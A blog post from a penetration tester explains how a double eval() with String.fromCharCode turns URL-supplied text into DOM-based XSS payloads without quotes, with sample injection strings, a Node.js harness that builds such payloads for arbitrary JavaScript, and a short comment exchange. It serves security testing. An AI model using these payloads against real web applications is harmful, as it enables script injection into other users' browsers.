Friday, December 02, 2011

Double eval() for DOM based XSS

DOM-based XSS is becoming relatively common in Web 2.0 and Ajax-driven applications. Such applications often use eval() to inject a new stream of code into the existing DOM. In certain cases it becomes tricky to pass values through during a pen-test and to build an abuse or exploit scenario. Recently, during a consulting engagement, we came across several DOM-based XSS issues where the objective was to get a pop-up to confirm the vulnerability. If the injection lands in an eval() call, it is possible to use a double eval() to turn plain text back into a payload.

Here is a simple scenario; it can be more complicated on a case-by-case basis.
For example, the code contains the following line:

eval('getProduct('+ koko.toString()+')');

Here "koko" comes from the URL, i.e. it is controlled by the user. Hence, whatever value we pass in the URL ends up inside the call to "getProduct".

The testing scenario is simple: it causes DOM-based XSS under the following condition.

We pass a payload that terminates the function call, ends the statement and comments out the rest of the script. We get a simple pop-up if we pass on the following code.

But to prove the point, suppose we want to craft a payload that needs a single quote, for example to execute document.getElementsByName('Login'). That will not work: the single quote raises a syntax error. For simplicity, if we pass alert('hi') it will not work either, and we get no pop-up in the above scenario. The reason is visible in the error below: the value is taken from the URL as-is, so the quotes reach eval() as the literal sequence %27, and alert(%27hi%27) is not valid JavaScript.

We get following error in the browser.

Error: syntax error
Source File:;elval(alert(%27hi%27));//
Line: 37, Column: 29
Source Code:

Interestingly, we can leverage a double eval() here. We pass on the following payload and see what happens...

It avoids the error and we get a pop-up. What we did is simple: we used String.fromCharCode() and passed the decimal character codes of alert('hi'). The application's eval() runs the payload; inside it, fromCharCode() rebuilds the string alert('hi') and a second eval() executes that string. No quote ever has to travel through the URL. Hence, double eval() can come to the rescue while testing DOM-based XSS.
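The following is an added example of my own, not code from the original post. It models the sink quoted above, eval('getProduct('+ koko.toString()+')'), with koko taken straight from the query string, and runs the quoted payload, the backslash-escaped variant and the fromCharCode double-eval payload through it under Node.js. The assumption (suggested by the %27 in the error message) is that the application does not percent-decode the parameter; a decode switch is added to show the contrast, which goes beyond what the post demonstrates. getProduct() and alert() are stand-ins that record their arguments.

```javascript
// Added example, not the original post's code. Models the vulnerable sink
//   eval('getProduct('+ koko.toString()+')');
// with koko copied from the URL. Assumption: the application does NOT
// percent-decode the parameter (the post's error shows literal %27).

const calls = [];    // arguments seen by getProduct()
const alerts = [];   // messages seen by the fake alert()

function getProduct(id) { calls.push(id); return id; }
function alert(msg) { alerts.push(String(msg)); }   // stand-in for window.alert

// The vulnerable sink. Direct eval() parses and runs the concatenated string
// in this function's scope, so getProduct() and alert() above are reachable.
// 'decode' is an added switch to contrast a decoding and a non-decoding app.
function sink(rawQueryValue, decode) {
  const koko = decode ? decodeURIComponent(rawQueryValue) : rawQueryValue;
  return eval('getProduct(' + koko.toString() + ')');
}

// Run one raw query value through the sink and report whether it parsed,
// what it threw, and what it alerted.
function runPayload(rawQueryValue, decode = false) {
  alerts.length = 0;
  try {
    sink(rawQueryValue, decode);
    return { ok: true, error: null, alerts: alerts.slice() };
  } catch (e) {
    return { ok: false, error: e.constructor.name, alerts: alerts.slice() };
  }
}

// Build the quote-free "double eval" payload for arbitrary JavaScript source.
// '1)' closes the getProduct( call, String.fromCharCode() rebuilds the source
// inside the page from its character codes, the payload's own eval() runs it,
// and '//' comments out the trailing ')' the application appends.
// Only digits, commas, parentheses and identifiers leave the attacker, so
// nothing needs URL encoding and no quote appears in the request.
function doubleEvalPayload(jsSource) {
  const codes = Array.from(jsSource, ch => ch.charCodeAt(0)).join(',');
  return '1);eval(String.fromCharCode(' + codes + '));//';
}

// Demonstration of the four cases discussed in the post and its comments.
console.log(runPayload('1);alert(%27hi%27);//'));          // SyntaxError: %27 stays literal
console.log(runPayload('1);alert(\\%27hi\\%27);//'));      // SyntaxError: stray backslash
console.log(runPayload(doubleEvalPayload("alert('hi')"))); // ok, alerts: ['hi']
console.log(runPayload('1);alert(%27hi%27);//', true));    // ok only if the app decodes
```

The third case is the technique from the post: the request carries only character codes, so the quote needed by alert('hi') is never subject to URL handling. The fourth case shows the caveat a tester should check first: if the application does decode the parameter (or it arrives via a POST body), the plain quoted payload works and the double eval() is unnecessary.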

Out of curiosity I searched the web to see whether people are using this trick and came across this article -
Double eval() can be leveraged for string operations and concatenation.


Jeremy said...

Wouldn't escaping the single tick work too? As in: ;alert(\'test\');//

shreeraj said...

Nope. It will not work - going through the URL, the browser will not process it. It may work through POST params.

Error: illegal character
Source File:;alert(\%27hi\%27)//
Line: 37, Column: 23
Source Code:
